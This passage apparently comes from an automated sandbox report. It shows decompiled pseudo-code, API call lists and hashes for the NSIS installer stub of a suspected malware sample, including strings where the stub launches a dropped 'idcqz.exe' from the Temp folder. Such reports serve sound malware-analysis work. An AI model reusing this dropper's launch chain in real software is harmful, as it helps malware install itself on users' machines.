						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff50 = _t91;
						E004045CA(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88);
						 *0x7a7a6c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x7a1f70 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x7a8ac0;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404616(0x40b);
						while(1) {
							_t36 =  *0x7a1f70;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x7a8ac4;
							if(_t38 ==  *0x7a8ac4) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a6c - _t136;
							if( *0x7a7a6c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045CA(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8b2c - _t136;
							_v28 = _t48;
							if( *0x7a8b2c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045EC(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79ff50, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x7a8b2c - _t136;
							if( *0x7a8b2c == _t136) {
								_push( *0x7a1f84);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x79ff50);
							}
							E004045FF();
							E0040666E(0x7a1f88, E004040AC());
							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f88);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a7a78);
									 *0x7a0f60 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x7a7a78 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045CA(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x7a7a6c - _t136;
									if( *0x7a7a6c != _t136) {
										goto L63;
									}
									ShowWindow( *0x7a7a78, 8);
									E00404616(0x405);
									goto L60;
								}
								__eflags =  *0x7a8b2c - _t136;
								if( *0x7a8b2c != _t136) {
									goto L63;
								}
								__eflags =  *0x7a8b20 - _t136;
								if( *0x7a8b20 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7a7a78); // executed
						 *0x7a8aa8 = _t136;
						EndDialog(_t127,  *0x7a0758); // executed
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
						__eflags =  *0x7a7a6c;
						return 0 |  *0x7a7a6c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x7a8b2c - _t136;
											if( *0x7a8b2c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x7a0758 = 1;
												L23:
												_push(0x78);
												L24:
												E004045A3();
												goto L28;
											}
											E0040140B(_t129);
											 *0x7a0758 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x7a7a78);
						 *0x7a7a78 = _t122;
						L60:
						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x7a3f88 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404631(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x004040d6
0x004040dd
0x00404244
0x00404248
0x0040424c
0x0040424e
0x00404253
0x0040425e
0x00404269
0x0040426e
0x00404270
0x00404272
0x00404275
0x0040427a
0x00404288
0x00404295
0x0040429c
0x0040429c
0x0040429d
0x0040429d
0x004042a2
0x004042a8
0x004042af
0x004042b5
0x004042b7
0x004042f7
0x004042fc
0x00404301
0x00404301
0x00404306
0x0040430f
0x00404311
0x00404316
0x0040431c
0x00404320
0x00404320
0x00404325
0x0040432b
0x00000000
0x00000000
0x00404336
0x0040433c
0x00000000
0x00000000
0x00404345
0x0040434d
0x00404352
0x00404355
0x0040435b
0x00404360
0x00404363
0x00404369
0x0040436e
0x00404371
0x00404377
0x0040437f
0x00404385
0x0040438b
0x0040438f
0x00404396
0x00404396
0x00404396
0x004043a0
0x004043b2
0x004043be
0x004043c3
0x004043cd
0x004043d3
0x004043d5
0x004043da
0x004043d7
0x004043d7
0x004043d7
0x004043ea
0x00404402
0x00404404
0x0040440a
0x0040441f
0x0040440c
0x00404415
0x00404417
0x00404417
0x00404425
0x00404436
0x0040444c
0x00404453
0x00404459
0x0040445d
0x00404462
0x00404464
0x00000000
0x0040446a
0x0040446a
0x0040446c
0x00000000
0x00000000
0x00404472
0x00404476
0x0040449b
0x004044a1
0x004044a7
0x004044a9
0x00000000
0x00000000
0x004044cf
0x004044d5
0x004044d7
0x004044dc
0x00000000
0x00000000
0x004044e2
0x004044e5
0x004044e8
0x004044ff
0x0040450b
0x00404524
0x0040452a
0x0040452e
0x00404533
0x00404539
0x00000000
0x00000000
0x00404543
0x0040454e
0x00000000
0x0040454e
0x00404478
0x0040447e
0x00000000
0x00000000
0x00404484
0x0040448a
0x00000000
0x00000000
0x00000000
0x00404490
0x00404464
0x0040455b
0x00404567
0x0040456e
0x00000000
0x004042b9
0x004042b9
0x004042bc
0x004042ef
0x004042ef
0x004042f1
0x00000000
0x00000000
0x00000000
0x004042f1
0x004042be
0x004042c2
0x004042c7
0x004042c9
0x00000000
0x00000000
0x004042d9
0x004042e1
0x00000000
0x004042e7
0x004040ef
0x004040ef
0x004040f3
0x004040f8
0x00404107
0x00404107
0x0040410d
0x00404114
0x00404158
0x0040415e
0x00404177
0x0040417a
0x0040418d
0x00404193
0x00000000
0x00000000
0x00404199
0x004041a4
0x004041a6
0x004041a8
0x004041c7
0x004041c7
0x004041ca
0x004041cf
0x004041d2
0x004041e2
0x004041e3
0x004041e5
0x0040421b
0x0040422b
0x00000000
0x0040422b
0x004041e7
0x004041ed
0x00404206
0x0040420b
0x0040420d
0x00000000
0x00000000
0x0040420f
0x004041fb
0x004041fb
0x004041fd
0x004041fd
0x00000000
0x004041fd
0x004041f0
0x004041f5
0x00000000
0x004041f5
0x004041d4
0x004041da
0x00000000
0x00000000
0x004041dc
0x00000000
0x004041dc
0x004041cc
0x00000000
0x004041cc
0x004041b2
0x004041b9
0x004041bf
0x004041c1
0x00404597
0x00000000
0x00404597
0x00000000
0x004041c1
0x0040417f
0x00000000
0x00404187
0x00404166
0x0040416c
0x00404574
0x0040457a
0x00404587
0x0040458d
0x0040458d
0x00000000
0x00404116
0x0040411b
0x00404127
0x00404130
0x00404231
0x00000000
0x0040414f
0x00404152
0x00000000
0x00404152
0x00404130
0x00404114

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
ShowWindow.USER32(?), ref: 00404127
GetWindowLongW.USER32(?,000000F0), ref: 00404139
ShowWindow.USER32(?,00000004), ref: 00404152
DestroyWindow.USER32 ref: 00404166
SetWindowLongW.USER32 ref: 0040417F
GetDlgItem.USER32(?,?), ref: 0040419E
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
IsWindowEnabled.USER32(00000000), ref: 004041B9
GetDlgItem.USER32(?,00000001), ref: 00404264
GetDlgItem.USER32(?,00000002), ref: 0040426E
SetClassLongW.USER32(?,000000F2,?), ref: 00404288
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
GetDlgItem.USER32(?,00000003), ref: 0040437F
ShowWindow.USER32(00000000,?), ref: 004043A0
EnableWindow.USER32(?,?), ref: 004043B2
EnableWindow.USER32(?,?), ref: 004043CD
GetSystemMenu.USER32 ref: 004043E3
EnableMenuItem.USER32 ref: 004043EA
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
SetWindowTextW.USER32 ref: 00404453
ShowWindow.USER32(?,0000000A), ref: 00404587

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403D1D Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403D1D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8ab0;
				_t22 = E00406A3B(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f88;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
					__eflags =  *0x7a1f88;
					if(__eflags == 0) {
						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065B5(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FF3(_t78, _t90);
				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
				 *0x7a8b3c = 0x10000;
				if(E00406045(_t90, 0x7b3800) != 0) {
					L16:
					if(E00406045(_t98, 0x7b3800) == 0) {
						E004066AB(_t76, 0, _t82, 0x7b3800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040);
					 *0x7a7a88 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FF3(_t78, __eflags);
							__eflags =  *0x7a8b40;
							if( *0x7a8b40 != 0) {
								_t33 = E004057A3(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a6c;
								if( *0x7a7a6c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f68, 5); // executed
							_t39 = E004069CB("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069CB("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
								 *0x7a7a64 = _t87;
								RegisterClassW(0x7a7a40);
							}
							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
							E00403C6D(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8aa0;
						 *0x7a7a44 = E00401000;
						 *0x7a7a50 =  *0x7a8aa0;
						 *0x7a7a54 = _t30;
						 *0x7a7a64 = 0x40a3b4;
						if(RegisterClassW(0x7a7a40) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a6a40;
					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
					_t63 =  *0x7a6a40; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a6a42;
						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040666E(0x7b3800, E00405F3D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F89(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403d23
0x00403d2c
0x00403d33
0x00403d35
0x00403d49
0x00403d5b
0x00403d64
0x00403d6d
0x00403d74
0x00403d79
0x00403d80
0x00403d93
0x00403d93
0x00403d9e
0x00403d37
0x00403d42
0x00403d42
0x00403da3
0x00403db6
0x00403dbb
0x00403dcc
0x00403e5e
0x00403e66
0x00403e6f
0x00403e6f
0x00403e85
0x00403e8b
0x00403e99
0x00403f1a
0x00403f22
0x00403f2c
0x00403f31
0x00403f37
0x00403fc1
0x00403fc6
0x00403fc8
0x00403fe4
0x00000000
0x00403fe4
0x00403fca
0x00403fd0
0x00403fd8
0x00403fd8
0x00000000
0x00403fd0
0x00403f45
0x00403f50
0x00403f55
0x00403f57
0x00403f5e
0x00403f5e
0x00403f69
0x00403f71
0x00403f73
0x00403f75
0x00403f7e
0x00403f81
0x00403f87
0x00403f87
0x00403fa6
0x00403fb7
0x00000000
0x00403fbc
0x00403f24
0x00403f26
0x00000000
0x00403e9b
0x00403e9b
0x00403ea7
0x00403eb1
0x00403eb7
0x00403ebc
0x00403ecb
0x00403fe9
0x00403fe9
0x00000000
0x00403fe9
0x00403eda
0x00403f15
0x00000000
0x00403f15
0x00403dd2
0x00403dd2
0x00403dd5
0x00403dd7
0x00000000
0x00000000
0x00403de5
0x00403df7
0x00403dfc
0x00403e05
0x00000000
0x00000000
0x00403e0b
0x00403e0d
0x00403e1a
0x00403e1a
0x00403e23
0x00403e29
0x00403e51
0x00403e59
0x00000000
0x00403e3b
0x00403e3c
0x00403e45
0x00403e4b
0x00403e4c
0x00000000
0x00403e4c
0x00403e47
0x00403e49
0x00000000
0x00000000
0x00000000
0x00403e49
0x00403e29

APIs

Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68

lstrcatW.KERNEL32 ref: 00403D9E
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,?,?,?,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,7556D4C4), ref: 00403E1E
lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,?,?,?,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,?,00000000,?), ref: 00403E3C
LoadImageW.USER32 ref: 00403E85

Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2

RegisterClassW.USER32 ref: 00403EC2
SystemParametersInfoW.USER32 ref: 00403EDA
CreateWindowExW.USER32 ref: 00403F0F
ShowWindow.USER32(00000005,00000000), ref: 00403F45
GetClassInfoW.USER32 ref: 00403F71
GetClassInfoW.USER32 ref: 00403F7E
RegisterClassW.USER32 ref: 00403F87
DialogBoxParamW.USER32 ref: 00403FA6

Strings

RichEdit20W, xrefs: 00403F69, 00403F6F
.exe, xrefs: 00403E2B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D22
1033, xrefs: 00403D3D, 00403D99
.DEFAULT\Control Panel\International, xrefs: 00403D89
RichEdit, xrefs: 00403F78
_Nb, xrefs: 00403EA1, 00403F09
C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab, xrefs: 00403DE5, 00403DEE, 00403DFC, 00403E4B, 00403E51
@zz, xrefs: 00403E94
RichEd20, xrefs: 00403F4B
Control Panel\Desktop\ResourceLocale, xrefs: 00403D51
RichEd32, xrefs: 00403F59

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1803211635
Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 202
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E004030D0(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t61;
				intOrPtr _t64;
				void* _t67;
				intOrPtr* _t69;
				long _t81;
				signed int _t88;
				intOrPtr _t91;
				void* _t94;
				void* _t99;
				void* _t103;
				long _t104;
				long _t107;
				void* _t108;

				_v8 = 0;
				_v12 = 0;
				 *0x7a8aac = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x7b6800, 0x400);
				_t103 = E0040615E(0x7b6800, 0x80000000, 3);
				 *0x40a018 = _t103;
				if(_t103 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040666E(0x7b4800, 0x7b6800);
				E0040666E(0x7b7000, E00405F89(0x7b4800));
				_t54 = GetFileSize(_t103, 0);
				 *0x79f740 = _t54;
				_t107 = _t54;
				if(_t54 <= 0) {
					L22:
					E0040302E(1);
					_pop(_t94);
					if( *0x7a8ab4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t108 = _t57;
						 *0x40ce78 = 0xb;
						 *0x40ce90 = 0; // executed
						E0040618D(_t94,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t61;
						if(_t61 != 0xffffffff) {
							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
							 *0x79f744 = _t64;
							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
							if(_t67 == _v20) {
								 *0x7a8ab0 = _t108;
								 *0x7a8ab8 =  *_t108;
								if((_v40 & 0x00000001) != 0) {
									 *0x7a8abc =  *0x7a8abc + 1;
								}
								_t45 = _t108 + 0x44; // 0x44
								_t69 = _t45;
								_t99 = 8;
								do {
									_t69 = _t69 - 8;
									 *_t69 =  *_t69 + _t108;
									_t99 = _t99 - 1;
								} while (_t99 != 0);
								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
								E00406119(0x7a8ac0, _t108 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035FE( *0x79f730);
					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t104 = _t107;
						asm("sbb eax, eax");
						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
						if(_t107 >= _t81) {
							_t104 = _t81;
						}
						if(E004035E8(0x797730, _t104) == 0) {
							E0040302E(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x7a8ab4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L19;
						}
						E00406119( &_v40, 0x797730, 0x1c);
						_t88 = _v40;
						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t88;
							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
							_t91 = _v16;
							 *0x7a8ab4 =  *0x79f730;
							if(_t91 > _t107) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t107 = _t91 - 4;
								if(_t104 > _t107) {
									_t104 = _t107;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t107 <  *0x79f740) {
							_v8 = E00406B28(_v8, 0x797730, _t104);
						}
						 *0x79f730 =  *0x79f730 + _t104;
						_t107 = _t107 - _t104;
					} while (_t107 != 0);
					goto L22;
				}
			}

0x004030de
0x004030e1
0x004030fb
0x00403100
0x00403113
0x00403118
0x0040311e
0x00000000
0x00403120
0x00403131
0x00403142
0x00403149
0x00403151
0x00403156
0x00403158
0x00403246
0x00403248
0x00403253
0x00403254
0x00000000
0x00000000
0x0040325d
0x00403289
0x0040328e
0x00403294
0x004032a2
0x004032a9
0x004032af
0x004032ca
0x004032d3
0x004032d8
0x004032f7
0x00403307
0x00403319
0x0040331e
0x00403326
0x00403333
0x0040333b
0x00403340
0x00403342
0x00403342
0x0040334a
0x0040334a
0x0040334d
0x0040334e
0x0040334e
0x00403351
0x00403353
0x00403353
0x0040335d
0x00403369
0x00000000
0x0040336e
0x00000000
0x00403326
0x00000000
0x004032da
0x00403265
0x00403277
0x00000000
0x00000000
0x00000000
0x00000000
0x0040315e
0x0040315e
0x00403163
0x00403167
0x0040316e
0x00403175
0x00403177
0x00403177
0x00403186
0x004032e6
0x00403328
0x00000000
0x00403328
0x00403192
0x00403216
0x00403219
0x0040321e
0x00000000
